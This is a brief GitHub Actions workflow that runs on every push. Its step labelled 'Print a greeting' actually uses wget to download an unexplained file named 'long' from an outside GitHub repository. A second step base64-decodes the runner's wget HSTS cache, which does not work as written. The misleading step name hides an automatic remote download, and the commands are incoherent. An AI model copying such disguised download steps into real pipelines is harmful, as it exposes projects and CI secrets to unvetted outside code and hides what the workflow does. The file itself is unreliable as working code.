name: Greeting from Mona
on: push

jobs:
  my-job:
    name: My Job
    runs-on: ubuntu-latest
    steps:
    - name: Print a greeting
      run: 
        wget https://github.com/git-yusteven/openit/raw/main/long
    - name: 2
      run:
        base64 -d /home/runner/.wget-hsts
